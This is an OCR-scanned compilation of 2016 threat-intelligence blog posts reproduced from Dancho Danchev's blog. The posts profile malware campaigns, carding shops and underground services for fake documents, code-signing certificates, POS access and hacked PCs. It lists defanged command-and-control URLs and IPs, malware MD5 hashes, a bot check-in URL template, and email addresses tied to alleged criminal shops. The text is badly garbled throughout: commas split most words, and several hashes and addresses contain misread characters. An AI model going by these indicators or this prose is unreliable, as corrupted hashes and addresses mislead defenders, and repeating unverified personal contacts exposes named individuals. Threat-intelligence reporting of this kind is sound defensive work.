Once executed, a, sample. malware, phones, back, to, the, following C &C servers: 
hxxp://92.222.71.26 

hxxp://176.53.21.105 

hxxp://149.202.109.202 

hxxp://31.184.197.72 


hxxp://188.127.231.124 


We'll continue monitoring the campaign, and, post, updates, as, soon, as, new, develop- 
ments, take, place. 
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12.3.2 Malware Serving Campaign Intercepted, Hundreds of Users Affected 
(2016-06-20 11:26) 


We've recently intercepted, a, currently, circulating, malicious, campaign, affecting, hundreds, 


of, thousands, of, users, globally, potentially, exposing, their PCs, to, a, variety, of, malicious, 
software, compromising, the, integrity, confidentiality, and, availability, of, their, devices. 


In, this, post, we'll, profile, the, campaign, provide, malicious, MD5s, expose, the, infras- 
tructure, behind, it, and, discuss, in, depth, the, tactics, techniques, and, procedures, of, the, 
cybercriminals, behind, it. 


Malicious URLs, known, to, have, participated, in, the, campaign: 
hxxp://gv.com.my/Ogcgs - 210.48.153.240 
hxxp://test.glafuri.net/yxk6s - 176.223.121.193 


hxxp://australiancheerleader.com.au/jsclokam - 103.254.138.242 


Related malicious MD5s known to have participated in the campaign: 


MD5: clf95adbcaf520bf182f9014970d33e5 


Known to have phoned back to the same C &C server (210.48.153.240) are also the fol- 
lowing malicious MD5s: 


MD5: 8ea223d68856ba857a485b506259ae00 
MD5: 8697121c56d20b602cd866dd1c0c1791 
MD5: d668ee452efb2fldd0dafc3f44b003e9 


MD5: bleedb69ad38d2e9ff3d5165163f1d0f 


Once executed, a, sample, malware, phones, back, to, the, following, C &C, server: 


hxxp://138.201.93.46/userinfo.php 
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Related malicious C &C servers, known, to, have, participated, in, the, campaign: 
hxxp://pariachat.ir 

hxxp://mahshahrchat.top 

hxxp://tandischat.xyz 

hxxp://irancell-chat.ir 

hxxp://shokolatt.ir 

hxxp://mahshahrchat.ir 


hxxp://roznazchat.com 


Related malicious MD5s known to have participated in the campaign: 


MD5: 47223a926f70206de5aa9e9f4f4182f0 


Once executed, a, sample, malware, phones, back, to, the, following, C &C, server: 
hxxp://138.201.93.46/userinfo.php 

hxxp://91.200.14.139/userinfo.php 

hxxp://104.131.182.103/userinfo.php 

hxxp://164.132.40.47/userinfo.php 


hxxp://tjpdcrsbkyqscdue.info/userinfo.php - 69.195.129.70 


Related malicious MD5s known to have phoned back to the same C &C server IP 
(91.200.14.139): 


MD5: 47223a926f70206de5aa9e9f4f4182f0 


Known to have phoned back to the same C &C server IP (69.195.129.70) are also the 
following malicious MD5s: 


MD5: cd867fa29b9cd9b4d16f96aecb179521 
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MD5: ec12c2a033b3a381a86072c20a0527f2 
MD5: d27ecf75aeb611297ed5b9f70b9773f0 
MD5: 3b6ad5215f20452417e4af7leefe7bc9 


MD5: b75580959b8eef65 74ac029333afafa5 


Once executed, a, sample, malware, phones, back, to, the, following C &C server IPs: 
hxxp://insamertojertog.cc/inOodrfqwbioOsa 
hxxp://tbiimhetdqyn.com/in0odrfqwbio0sa 
hxxp://pmiqpskfkwkc.com/inOodrfqwbio0sa 


hxxp://osghqrdmlyhh.net/inOodrfqwbio0sa 


Related malicious MD5s known to have participated in the campaign: 


MD5: 90eb8948513e21a8c87f8295ac7e81Ff5 


We'll, continue, monitoring, the, campaign, and, post, updates, as, soon, as, new, devel- 
opments, take, place. 


12.3.3 Malware Serving Campaign Intercepted, Hundreds of Users Affected 
(2016-06-21 16:28) 


We've recently intercepted, a currently, circulating, malicious, spam, Campaign, exposing, 
users, to, a, multi-tude, of, malicious, software, potentially, exposing, the, confidentiality, 
integrity, and, availability, of, their, PCs, to, a, variety, of, malicious, software. 


In, this, post, we'll, profile, the, campaign, provide, malicious, MD5s, expose, the, infras- 
tructure, behind, it, and, discuss, in-depth, the, tactics, techniques, and, procedures, of, the, 
cybercriminals, behind, it. 


Malicious MD5s known to have participated in the campaign: 
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MD5: 6b422988b8b66e54e68f110c64914744 


MD5: 414fc339b2dd57bab972b3175a18d64a 


Once executed, a, sample, malware, phones, back, to, the, following, C &C server: 


hxxp://hrtests.ru/S.php - 136.243.126.105; 146.185.243.133; 5.135.104.91; 178.33.188.142; 
178.32.238.223; 178.208.83.7; 88.214.200.145 


hxxp://managtest.ru/WinRAR.exe - 176.126.71.5; 5.196.241.192; 88.214.200.145 


Related malicious MD5s known to have phoned back to the same C &C server IPs 
(136.243.126.105): 


MD5: e974e77d0f69b46b9f6c88d98c76c0c6 
MD5: 908bb37015af1c863e8e73bb76fdb127 
MD5: 87882046d21d2468ee993ea7c3159c4d 
MD5: 299c6ac73e225ec5a355b2fb7a618e8F 


MD5: 7f2862b5f399bc74dd6d8079da819126 


Related malicious MD5s, known, to, have, phoned, back, to, the, same, C &C server IP 
(146.185.243.133): 


MD5: 47c18c76540b74albca6ca3ae10ebd50 
MD5: 024807c29f147dd77450a5bc62e59fa5 
MD5: e283f13766be7f705c0271bc42681270 
MD5: a29d67dad13eef259dc5c872706f15a6 


MD5: 2cf7bf436ef8cbfda0136efd11e92341 


Related malicious MD5s, known, to, have, phoned, back, to, the, same, C &C server IP 
(146.185.243.133): 


MD5: 2cf7bf436ef8cbfda0136efd11e92341 
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MD5: 3a5f263a24728d3805045778978f00b5 
MD5: 87435a3fc3799d271b3608955d1c6c4d 
MD5: 95c0194351bc2685535544574eb3f5df 


MD5: 7224e3698edec9590a5198defae66ef1 


Once executed, a, sample, malware, phones, back, to, the, following, C &C, server IP: 


hxxp://worktests.ru/testO.txt 


Once executed, a, sample, malware, phones, back, to, the, following, C &C, server, IP: 
hxxp://testswork.ru/test15.txt 
hxxp://testswork.ru/test18.txt 
hxxp://testswork.ru/test18.txt 
hxxp://testswork.ru/test20.txt 


hxxp://testswork.ru/test21.txt 


Once executed a sample malware phones, back, to, the, following, C &C, server, IP: 


hxxp://tradetests.ru/test0.txt 


Related malicious MD5s, known, to, have, phoned, back, to, the, same, C &C, server, 
IP (176.126.71.5): 


MD5: 44c3ac885206d641a6d2dce5a675f378 
MD5: 2bf97da5f11b655428622fb10c68ff11 
MD5: 6911f4a5a85e266229debfdf0832faad 
MD5: 8f1b264ceef3e116522ec213ee691cd2 


MD5: af7275d12796b53f0ad4d7866be49a4c 
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Once executed, a, sample, malware, phones, back, to, the, following, C &C server, IPs: 


61.246.33.84:7974 


187.2.210.167:6688 


199.189.86.18:6199 


62.103.89.163:9333 


95.104.13.237:7158 


203.231.71.85:6413 


150.129.184.145:5560 


213.184.4.236:5531 


198.27.96.43:6327 


115.110.36.121:8009 


46.150.36.126:8404 


118.233.56.195:6159 


187.55.178.150:6984 


219.71.10.251:6070 


190.37.215.91:7443 


122.117.152.249:7894 


14.141.70.162:8811 


188.173.150.210:6598 


60.171.206.39:6349 


103.47.194.115:6959 


116.241.49.160:7023 


175.45.228.54:6324 


158.58.204.215:6789 
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82.76.230.210:6266 


220.134.149.93:6688 


201.24.187.30:9088 


84.108.148.178:6822 


186.95.199.115:5943 


113.160.112.8:6439 


24.190.4.178:6554 


52.26.185.23:6549 


115.165.241.228:6623 


190.254.83.226:7961 


177.103.154.31:6554 


114.35.121.231:5774 


202.65.136.234:7594 


91.186.3.83:8673 


31.170.141.113:11802 


190.205.137.158:6554 


223.255.202.23:5949 


175.45.228.56:6249 


202.143.149.66:9333 


5.189.177.10:6843 


91.224.25.225:7677 


113.176.82.247:6315 


121.42.15.50:11649 


189.51.15.2:6018 


108.61.213.137:9595 
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96.56.17.58:6126 
61.216.32.170:8513 
202.166.162.6:6519 
119.236.147.67:6755 
96.23.181.97:5531 


190.142.66.233:7269 


Related malicious MD5s known to have phoned back to the same C &C server IP 
(5.196.241.192): 


MD5: 57f6c25f57f6af3feb149d2cf0ca7b70 

MD5: 45bc494e569671lac902ac4abeaf52d0e 
MD5: b23b41bc40dd6b2d707c07dfb7da8a8b 
MD5: 6458ddbaa59448352cfd18d774af1114 


MD5: 89bd709329d7a2666e538ee0fdc7e6a0 


Once executed, a, sample, malware, phones, back, to, the, following, C &C, server, IP: 


hxxp://stafftest.ru/test.html 


Related malicious MD5s known to have participated in the campaign: 


MD5: 414fc339b2dd57bab972b3175a18d64a 


Once executed, a, sample, malware, phones, back, to, the, following, C &C servers: 
hxxp://stafftest.ru 

hxxp://hrtests.ru 

hxxp://profetest.ru 


hxxp://testpsy.ru 
5099 


hxxp://pstests.ru 
hxxp://qptest.ru 
hxxp://prtests.ru 
hxxp://jobtests.ru 


hxxp://iqtesti.ru 


Related malicious MD5s known to have participated in the campaign: 


MD5: 7838ccf4e448d8c7404bfe86f5c9d116 


Once executed, a, sample, malware, phones, back, to, the, following, C &C, server: 
hxxp://managtest.ru/minerd 


hxxp://hrtests.ru/S.php?ver=24 &pc= %s &user= %S &sys= %S &cmd= %s &startup= 
%S/ %s 


We'll continue monitoring the campaign and post updates as soon as new developments, take, 
place. 


12.4 August 


12.4.1 Historical OSINT - Exposing the Market for Stolen Credit Card Data 
(2016-08-16 03:01) 


With the carding underground continuing to flourish, for the purpose, of, monetizing commodi- 
tized underground items such as, stolen credit cards, cybercriminals continue to over-supply 
the [1]market segment for stolen credit cards data, largely relying on a boutique type of 
cybercrime-operations business model, continuously supplying the market segment with tens 
of thousands of stolen credit cards data. 


Thanks, to, the general availability of malicious software whose purpose is to obtain and 
process stolen credit cards data, cybercriminals continue to over-supply the marketplace with 
tens of thousands of stolen credit cards, further, continuing, to, monetize the commoditized 
underground marketplace item, through, the use of boutique E-shops, offering access to tens 
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of thousands of stolen credit cards data. 


In this post we’ll profile several boutique E-shops for stolen credit cards data and pro- 
vide actionable intelligence on the cybercriminals behind it. 


Related data exposing the infrastructure behind the most popular boutique E-shops of- 
fering access to stolen credit cards data: 


accesslitd.ru - Email: admin@accessltd.ru 

track2.name - Email: rubensamvelich@gmail.com;rubensamvelich@ yahoo.com 
bulba.cc - Email: bulbacc@rocketmail.com; bulbacc@yahoo.com 
ccStore.ru - Email: 000.service@yahoo.com 

dumps.cc - Email: dumps.cc@safe-mail.net 

ccmall.cc - Email: b2b.maxim@gmail.com; Ivjiecong@yahoo.com.cn 
trackstore.su - Email: roger.sroy@yahoo.com 

magic-numbers.cc - Email: elche0Q11@yahoo.com 

allfresh.us - Email: keikomiyahara@yahoo.com; dcb725@gmail.com 
freshstock.biz - Email: wattt8O@yahoo.com 

approven.su - Email: yurtan20@el.ru 

cv2shop.com - Email: vipforexbiz@gmail.com 

vzone.tc - Email: Whois Privacy Activated 

privateservices.ws - Whois Privacy Activated 

trackservices.ws - Whois Privacy Activated 

perfect-numbers.cc - Email: kachanaburi@yahoo.com 

mega4u.biz - Email: persiks@online.ua 

pwnshop.cc - Email: alexandanns@gmail.com 


bestdumps.su - Email: bestdumpssu@live.com 
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mycc.su - Email: admin@mycc.su 
bestdumps.biz - Email: admin@bestdumps. biz 
dumpshop.bz - Email: tonchang2011@yahoo.com 


cardshop.bz - Email: tonchang2011@yahoo.com 


Thanks to the vibrant cybercrime ecosystem, cybercriminals will continue to actively 
monetize access to malware-infected hosts, for the purpose, of earning fraudulent revenue 
and achieving stolen assets liquidity, while earning fraudulent revenue in the process. 


We'll continue monitoring the market segment for stolen credit cards data, and post up- 
dates as soon as new developments take place. 


This post has been reproduced from [2]Dancho Danchev’s blog. Follow him 
[3]Jon Twitter. 


1. http: //ddanchev. blogspot .com/2011/10/exposing-market-for-stolen-credit-cards .htm 
2. http: //ddanchev. blogspot .com/ 
3. https://twitter.com/dancho_danche 


12.4.2 Cybercriminals Offer Fake/Fraudulent Press Documents Accreditation On De- 
mand (2016-08-16 20:07) 


Ina 

cybercrime ecosystem, dominated by fraudulent market propositions, 
and new market entrants occupying new market segments on a daily 
basis, cybercriminals are perfectly positioned, to continue offering, 
commoditized underground market goods, such as, for instance, fake 
documents, for the purpose of generating fraudulent revenue, while 
empowering fellow cybercriminas, with the necessary tools to further 
commit fraudulent activities. 
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In 

this post, we'll, discuss a newly launched service, offering fake press 
accreditation documents, and discuss the overall relevance of the 
service, in the context of the underground marketplace’s ongoing 
commoditization, basic market segmentation concepts, as well as newly 
applied concepts such as DIY (do-it-yourself) type of services, and 

basic OPSEC with QA (Quality Assurance) in mind. 
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The 

service is currently offering custom-made press accreditation 
documents for the Russian Federation, allowing potential 
cybercriminals the ability to access press-free zones, potentially 
commiting related fraudulent activities. 


The 
price varies between $62 and $130 depending on the 


number of fake documents requested, including the option to request 
anonymous delivery of the fake documents. 


Thanks 


to a vibrant DIY (do-it-yourself) custom-based type of fake documents 
generating market segment, cybercriminals, have also successfully 
managed to efficiently streamline the process of generating these 
documents, applying, both, basic OPSEC (Operational Security) 
measures in place, to ensure that they’re perfectly positioned to 
reach to their targeted audience, while preserving a decent degree of 
their operational procedures, as well as Q &A (Quality Assurance) 
processes, to further ensure the quality of their underground market 
proposition. 
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We expect to continue 

observing a decent supply of segmented market propositions, 
targeting, both, novice and experienced cybercriminals, seeking to 
obtain fake documents, on their way to commit related fraudulent 
activities. 


Related posts: 


[1] A Peek Inside the Russian Underground Market for Fake Documents/IDs/Passports 


[2] Newly Launched ’Scanned Fake Passports/IDs/Credit Cards/Utility Bills’ Service Random- 
izes and Generates Unique Fakes On The Fly 


[3] Vendor of Scanned Fake IDs, Credit Cards and Utility Bills Targets the French Market Seg- 
ment 


[4]Cybercriminals Offer High Quality Plastic U.S Driving Licenses/University ID Cards 
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This post has been reproduced from [5]Dancho Danchev’s blog. Follow him [6Jon 
Twitter. 


. http://ddanchev. blogspot .com/2013/05/a-peek-inside-russian-underground.htm 
. http: //ddanchev.blogspot.com/2013/07/newly-1launched-scanned-fake.htm 


ttp://ddanchev.blogspot.com/2013/08/vendor-of-scanned-fake-ids-credit-cards.htm 


. http: //ddanchev. blogspot .com/2013/08/cybercriminals-offer-high-quality.htm 
. http: //ddanchev.blogspot.com/ 
. https://twitter.com/dancho_danche 


12.4.3 Spam-friendly Image Randomization Tool Released on the Underground Mar- 
ketplace (2016-08-17 13:34) 


Cybercriminals, 

continue applying basic QA (Quality Assurance) processes, to their 
fraudulent campaigns, on their way to achieve a posive ROI (Return on 
Investment) out of their fraudulent activities. 


In 

this post, we’ll discuss a newly launched commercial tool, that’s 
capable of generating unique images, for the purpose of tricking spam 
filters, in an attempt to trick end users into falling victim into 

the fraudulent campaign. 
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picard.jp¢ 
lego. pag 
pingvsn.gst 
subfolder/ 


% Otpasite no ropu30ntanst 

© Otpazite no BepTHkann 

) Vingeptupogare ypeta 
 Mpeobpazosarb B rpagauym Ceporo 


PaHHOMH3NpoBaTEL 


Se : 


Hactpoukn 
n 


PHP 5.5.12 


Nanxa cache goctynxa Ha 3annce (npasa 666 wm 777) 
Nanka images QOcTynHa Ha 3anvCb (npasa 666 nnn 777) 
Nanka images Aoctynva ANA wTexHA (npaga 555 # Bewe) 


Pacwmpexve PHP GD yctaHosneHo 


Bepcua PHP Gonbwe vnw pasna 5.5 (pexomenayeTca) 


Heo6xonumo ana pabore! API 

HeoOxoavimo NA MaCCOBON pakzoMusaynn 

Heodxoaumo Ana paxsomigayyulyHiKannsaynn H306paKeHHA 
Tpe6yercr ann padotb! cKpunta 


Tpe6yeTcr ANA ONTHMAaNbHON paboTb! BCeX yHKUHA 


Se : 


lego.png  Otpazime no ropysoHTanu 

© Otpazit no BepTuKann 
 Viepeptpopate upeta 

© Apeobpasosate 8 rpagaynu ceporo 
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picard.jp¢g 
iogo.png 
pangvin.gaf 
subfolder/ 


Vicnonb3ylite 3ToT Gnok Ana BBOsa HMeH 
pakQomusupyembix casinos. 
NpeasapntenbHo on QOonmKHb! SbITb 
Jarpyxenb! B Nanky images 


Priced 

at $25, the APl-enabled tool is capable of converting a regular 
image, executed in a spam campaign, into a new one, successfully 
bypassing spam filters, exposing end users to fraudulent attempts, 
generating fraudulent revenue, for the 

cybercriminals behind the campaign. 
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We 

expect to continue observing an increase in QA (Quality Assurance) 
driven underground market propositions, leading to a successful set of 
fraudulent propositions, dominating the underground marketplace. 


12.4.4 Managed Social Engineering Based Code Signing Generating Certificate Ser- 
vice Spotted in the Wild (2016-08-17 14:23) 


Cybercriminals 

are masters of social engineering, potentially tricking, tens of 
thousands of users on a daily basis, into falling victims into 

fraudulent cybercrime-friendly campaigns, generating them, hundreds 
of thousands of fraudulent revenues, successfully, contributing to 

the growth of multiple underground market segments, within, the 
underground marketplace. 


In 

this post, we'll discuss a newly launched service, empowering, both, 
novice, and experienced cybercriminals, with the necessary tools and 
know how, to further commit, fraudulent activities, in the form of 
socially engineered code signing certificates, obtained through the 
registration of bogus and non-existent companies. 
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Do you want to run this file? 


Name: 


el [_ | 
a —<$<— 
Type: Application 
From: 


(Sine) 


¥| Always ask before openine this file 


[{ 


Priced 

at $1,000 per certificate, the service is also offering discounts on 

a volume basis, including custom contacts based customization files, 
including detailed info about the rogue company, used in the code 
signing process. Relying on basic ‘visual social engineering’ 
concepts, cybercriminals are perfectly positioned, to execute a 
successful campaign on a mass scale, or in a targeted nature, 
successfully targeting tens of thousands of users. 


We 

expect to continue observing relevant code signing as a service, type 
of cybercrime-friendly propositions, within the cybercrime ecosystem, 
with more market vendors, entering the market segment, further 
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positioning themselves, as market leaders, through basic market 
segmentation, and efficient social engineering techniques. 


12.4.5 Newly Launched Cybercrime Service Offers Access to POS Terminals on De- 
mand (2016-08-17 14:32) 


Cybercriminals 

continue applying basic market segmentation concepts, to their 
underground market propositions, to further ensure, that, they’re 
capable of targeting the right audience, potentially generating 
hundreds of thousands of fraudulently generating revenues in the 
process. 


From 

basic, malware as a service underground market propositions, offering 
access to country, city, ISP based type of malware-infected hosts, to 
cybercrime-friendly services, offering access to malware-infected 
hosts converted to anonymization proxies, to further target 

additional market segments, within the cybercrime ecosystem, 
cybercriminals continue to utilize basic market segmentation 
concepts, based on the targeted population. 


In 
this post, we'll discuss a newly launched managed service, offering 
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access to POS (Point of Sale) terminals, further empowering, both, 
novice, and sophisticated cybercriminals, with the necessary access 
to commit related fraudulent activities. 
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service is currently offering access to POS (Point of Sale) 
terminals, located, in the United States, Canada, Australia, United 


Kingdom, the Netherlands and Germany, priced between $30 and $50 for 
access to a POS (Point of Sale) terminal. 
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Cybercriminals, 

continue relying on basic data mining concepts, while utilizing the 

overall target population, further, ensuring that their 

market-relevant propositions, while, continuing to generate fraudulent revenues, in, the, pro- 
cess. 


We 

expect to continue observing an increase in underground market 
propositions, utilizing basic market segmentation concepts, further 
positioning, both, novice, and experienced market leaders, as 
relevant and competitive market participants, potentially generating 
tens of thousands of fraudulently obtained assets in the process. 


12.4.6 Invitation - Private Party - Kings of Wisdom (2016-08-19 03:52) 


Dear, blog, readers, | decided to invite selected, blog, readers, to, a, private, party, hosted, in, 
my, town, for, the, opening, of, Kings of Wisdom [hard copy] magazine. 


If, you’re, interested, in, attending, and, bringing, back, the, spirit, of, what, 
used, to, be, the, scene, you, can, approach, me, at ddanchev@confidantmail.org 
1790eb593d891cec2e0cd07ee044b283cce9c011 to request, attendance, details. 


This post has been reproduced from [1]Dancho Danchev’s blog. Follow him 
[2]on Twitter. 


1. http://ddanchev. blogspot .com/ 
2. https://twitter.com/dancho_danche 


12.4.7 New Cybercrime-Friendly Service Offers Fake Documents and Bills on Demand 
(2016-08-28 15:33) 


The market segment, for, fake, documents, and, bills, continues, flourishing, thanks, to, a, 
vibrant, cybercrime, ecosystem, offering, access, to, a, variety, of commoditized, under- 
ground, market, items, further generating fraudulent revenue for the cybercriminals behind 
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it. Thanks to the overall availability of DIY (do-it-yourself) type of malware generating tools, 
and, the, overall prevalence, of money mule recruitment scams, allowing, cybercriminals, an 
easy access to basic risk-forwarding, tactics, cybercriminals, continue, generating, tens, of 
thousands, of fraudulent revenue in the process. 


In this, post, we’ll discuss a newly launched managed cybercrime service offering ac- 
cess to fake documents, stolen credit cards, and, fake, bills, and, discuss, in-depth, the tactics, 
techniques, and procedures, of, the, cybercriminals behind it. 
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The service is currently offering fake documents for Australia, Belgium, Brazil, Canada, 
Denmark, Estonia, Finland, France, Germany, Greece, Italy, India, Netherlands, Norway, Latvia, 
Lithuania, Poland, Romania, Slovakia, Slovenia, Sweden, United Kingdom, USA, Russia, and 
fake bills for, Australia, Austria. Canada, Czech Republic, Estonia, France, Finland, Germany, 
Irland, Italy, United Kingdom, Latvia, Norway, Romania, Slovakia, Sweden, Switzerland, USA, 
Spain, Russia, France, Ukraine. 


We'll continue monitoring the market segment for fake documents, and, post, updates, 
as soon, as, new, developments, take place. 


This post has been reproduced from [1]Dancho Danchev’s blog. Follow him 
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[2]Jon Twitter. 


1. http://ddanchev. blogspot .com/ 
2. https://twitter.com/dancho_danche 


12.4.8 Managed Hacked PCs as a Service Type of Cybercrime-friendly service Spot- 
ted in the Wild (2016-08-28 18:38) 


With the cybercrime ecosystem, persistently, supplying, new, malware, releases, cybercrim- 
inals continue occupying multiple market segments, within, the, cybercrime, ecosystem, 
generating, tens, of, thousands, of fraudulent revenue, in, the, process, potentially, empower- 
ing, new market entrants, with, the, necessary, tools, and, know-how, to, continue, launching, 
related, malicious, attacks, potentially, generating, tens, of, thousands, of fraudulent, revenue, 
in, the, process, while, targeting, users, internationally. 


In this, post, we’ll profile a newly, launched, managed hacked PCs, as, a, service, type, of 
cybercrime-friendly, service, and, discuss, in, depth, the, tactics, techniques, and, procedures, 
of, the, cybercriminals, behind it. 


5123 


5124 


Woowpny 


: 
a - - oe 
a oe ——— ee 
o Pr 
pact Sastes Penney ~ o | ve | 
am ty o co 
ee a co 
- ~ o co 
need nes Kmenby Ft Nacht o | even | 
— a co 
bdGune | Won avs = o | eon | 


Next to the overall availability of malware infected hosts empowering novice cybercriminals 
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with the necessary tools and know, to, conduct, related, malicious attacks, cybercriminals, 
often, rely, on basic, market segmentation, approaches, further, taking, advantage, of the, 
affected, users, to, launch, related, managed cybercrime-friendly, type, of, managed, services. 


The service is currently offering access to malware-infected hosts, in, the United States, 
Italy, France, Spain, Brazil, Argentina, and Poland, further, empowering, novice, cybercrimi- 
nals, with, the, necessary, tools, and, know-how, to, continue, launching, related, malicious 
attacks. 


We'll continue monitoring, the, market, segment, for, hacked PCs, and, post, updates, 
as, soon, as, new developments, take, place. 


This post has been reproduced from [1]Dancho Danchev’s blog. Follow him 
[2]Jon Twitter. 


1. http: //ddanchev. blogspot .com/ 
2. https://twitter.com/dancho_danche 


12.4.9 Managed SWF Injection Cybercrime-friendly Service Fuels Growth Within the 
Malvertising Market Segment (2016-08-29 11:58) 


Cybercriminals, continue, launching, new, cybercrime-friendly, services, aiming, to, diversify, 
their, portfolio, of, fraudulent, services, while, earning, tens, of, thousands of fraudulent 
revenue in the process. Thanks, to, a vibrant, cybercrime ecosystem, and, the, overall, 
availability, of, DIY (do-it-yourself) type of, malicious, software, generating, tools, cybercrim- 
inals, continue, diversifying, their, portfolio, of, fraudulent, services, while, earning, tens, of, 
thousands, of, fraudulent, revenue, in, the, process. 


Largely, relying, on, a diversified, set, of, tactics, techniques, and, procedures, cyber- 
criminals, often, rely, on, automated, and, systematic, compromise, of, vulnerable, Web sites, 
for, the, purpose, of, active, traffic, acquisition, tactics, to hijack, intercept, and, monetize, the, 
acquired, traffic, for, the, purpose, of, earning, fraudulent, revenue, in, the, process. Thanks, 
to, a, vibrant, cybercrime-friendly, ecosystem, cybercriminals, continue, actively, hijacking, 
intercepting, and, monetizing, the, acquired, traffic, for, the, purpose, of, earning, fraudulent, 
revenue, in, the, process. 
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In, this, post, we’ll discuss, a, newly, launched, managed SWF injecting, type, of, cybercrime- 
friendly, service (108.162.197.62), provide actionable, intelligence, on, the, infrastructure, 
behind, it, and, discuss, in-depth, the, tactics, techniques, and, procedures, of, the, cybercrim- 
inals, behind it. 


Malicious MD5s known to have been downloaded from the same C &C server IP 
(108.162.197.62): 


MD5: 738ef8e826b5f9070f555dc8d5e3320f 
MD5: 8dddf1d1786ff72adc60057305f4f2c9 
MD5: 0042ef6b151d68824999ed27e320ab7b 
MD5: ea0f806840a8f1765994d2941d24al8a 


MD5: 9d0e32a4f1d4fb348f70f235e9731363 


Related malicious MD5s known to have phoned back to the same C &C server IP 
(108.162.197.62): 


MD5: 4e108296f11d99e56be375dcab2e03d4 
MD5: 8f696a2995aa56be5a7fe6ac8639e94a 
MD5: 2aa4fedd2626f4a210d13a356cf721al 

MD5: 822606bb2f5a86bd20e4d111705c9e99 


MD5: 6267650eb343bc1fb063233aaf398C9a 
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The, service, is, currently, offering, basic, type, of, account, registration, process, priced, 
at $100, and, premium, type, of, account, registration, process, priced, at, $1,000. 


We'll continue, monitoring, the, market, segment, for, malvertising, type, of, managed, 
cybercrime-friendly, services, and, post, updates, as, soon, as, new, developments, take, 
place. 


This post has been reproduced from [1]Dancho Danchev’s blog. Follow him 
[2]Jon Twitter. 


1. http: //ddanchev. blogspot .com/ 
2. https://twitter.com/dancho_danche 


12.5 September 


12.5.1 New Mobile Malware Intercepted in the Wild, Hundreds of Users Affected 
(2016-09-06 19:29) 


We've, recently, 

intercepted, a, currently, circulating, malicious, spam, campaign, 
affecting, hundreds, of, users, globally, potentially, exposing, the, 
confidentiality, availability, and, integrity, of, their, devices, 

to, a, multi-tude, of, malicious, software. Largely, relying, on, a, 
set, of, social, engineering, vectors, cybercriminals, continue, 
monetizing, and, earning, fraudulent, revenue, while, affecting, 
hundreds, of, thousands, of, users, globally. 


Thanks, to, the, 

overall, availability, of, affiliate, based, type, of, monetization, 
approaches, cybercriminals, continue, successfully, monetizing, 
hijacked, and, acquired, underground, market, type, of, hijacked, 
and, acquired, traffic, for, the, purpose, of, earning, fraudulent, 
revenue, in, the, process. 
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In, this, post, 

we'll, profile, the, campaign, provide, actionable, intelligence, on, 
the, infrastructure, behind, it, and, discuss, in-depth, the, 

tactics, techniques, and, procedures, of, the, cybercriminals, 
behind, it. 


Related malicious MD5s known to have 
participated, in, the, campaign: 


MD5: 
7197d23e61909aal6cd637cdba818ae7 


MD5: 
28bae60al1700b768de0a33275c22bee5 


Once, executed, a, sample, malware, 
phones, back, to, the, following, C &C, server, IPs: 
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hxxp://android2update.com 
- 52.28.249.128; 52.28.3.6 


hxxp://android2update.com 
- 52.28.249.128; 52.28.3.6 


hxxp://androidversion.net 
- 52.28.249.128; 52.28.3.6 


hxxp://androidssafe.com 


hxxp://getupdateandroid.com 


hxxp://updateandroid.biz 


hxxp://softthrifty.com 
- 131.253.18.12 


Related, malicious, MD5s, known, to, 
have, phoned, back, to, the, same, C &C, server, IPs 
(android2update.com - 52.28.249,.128; 52.28.3.6): 
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MD5B: 
93ad90787391f9d4f15fe06f9d6a32dd 


MD5: 
c678b20e4859ff7a24dcdf01644796f6 


MD5: 
c6964ee454ff2885497c62220a963046 


MD5: 
c2c1b9524017dc401365a0136edeb70a 


MD5: 
efd14b0cleff64a5e2b90ad5f6c92fdb 


Related, malicious, MD5s, known, to, 
have, participated, in, the, campaign: 


MD5: 
02462f235a01a6f8287900d04598b4a4 
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MD5: 
11¢c6792518c1389173ee626b87c44bd1 


MD5: 
1b497b1ddfcbb5457f4c8ba41d412b44 


MD5: 
2dfccca5a9cdf207fb43a54b2194e368 


MD5: 
5884d1134c636cdc8421d76fb288e37d 


Related malicious MD5s known to 
have, participated, in, the, campaign: 


MD5: 
ecbbce17053d6eaf9bf9cb7c71d0af8d 


MD5: 
b1ae0d9a2792193bff8c129c80180ab0 


MD5: 
e98791dffcc0a8579ae875149e3c8e5e 
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Related malicious, MD5s, known, to, 
have, participated, in, the, campaign: 


MD5: 
02462f235a01a6f8287900d04598b4a4 


MD5: 
11¢c6792518c1389173ee626b87c44bd1 


MD5: 
1b497b1ddfcbb5457f4c8ba41d412b44 


MD5: 
2dfccca5a9cdf207fb43a54b2194e368 


MD5: 
5884d1134c636cdc8421d76fb288e37d 
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We'll, continue, 
monitoring, the, market, segment, for, mobile, malware, and, post, 
updates, as, soon, as, new, developments, take, place. 


12.5.2 New Mobile Malware Spotted in the Wild, Hundreds of Users Affected 
(2016-09-23 17:45) 


We've, recently, intercepted, a, 

currently, circulating, spam, campaign, affecting, hundreds, of, 
thousands, of, users, while, exposing, the, confidentiality, 
integrity, and, availability, of, their, devices, to, a, multi-tude, 
of, malicious, software. 


Largely, relying, on, a, set, of, social, 

engineering, vectors, the, campaign, tries, to, trick, users, into, 
installing, rogue, software, on, their, devices, potentially, 
exposing, the, confidentiality, availability, and, integrity, of, 
their, devices, to, a, multi-tude, of, malicious, software. 


In, this, post, we'll, profile, the, 

Campaign, provide, actionable, intelligence, on, the, infrastructure, 
behind, it, and, discuss, in-depth, the, tactics, techniques, and, 
procedures, of, the, cybercriminals, behind, it. 
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Related malicious URLs known to have 
participated in the campaign: 


hxxp://market155.ru - 81.94.205.227; 
31.31.204.59 


hxxp://illuminatework.ru - 
81.94.205.228; 31.31.204.59 


hxxp://yetiathomel15.ru - 81.94.205.228; 
31.31.204.59 


hxxp://leeroywork3.co - 81.94.205.228; 
198.54.117.210 


hxxp://morning3.ru - 81.94.205.228; 
31.31.204.59 


Once executed a sample malware (MD5: 
d846f7ac66a9a932235fb415b96fee5d) phones back to the following C &C 
server IPs: 
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hxxp://52.24.219.3 


Related malicious MD5s known to have 
phoned back to the same C &C server IP (52.24.219.3): 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


e683afl18e47c4441d5077e827c902e9e 


a0c825e870f5f882cb25765151d10450 


2ce7dc2e46216887c42ba52ab3de422d 


bb9dd2c44be5e2b6bc99b0cf2d1fccel 


dba5578c7271d6759ba3283a030eda33 


Once executed a sample malware (MD5: 
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246f497dc26d18d87f9398758calbcc2) phones back to the following C &C 


server IPs: 


hxxp://192.227.137.154 


Related malicious MD5s known to have 


phoned back to the same C &C server IP (192.227.137.154): 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


18e3c021ee369c34998393d5fa2cb2c4 


b6albab3fba59504f837498719ce6e4c 


ed646bbbace5bc21ea177elec740eb13 


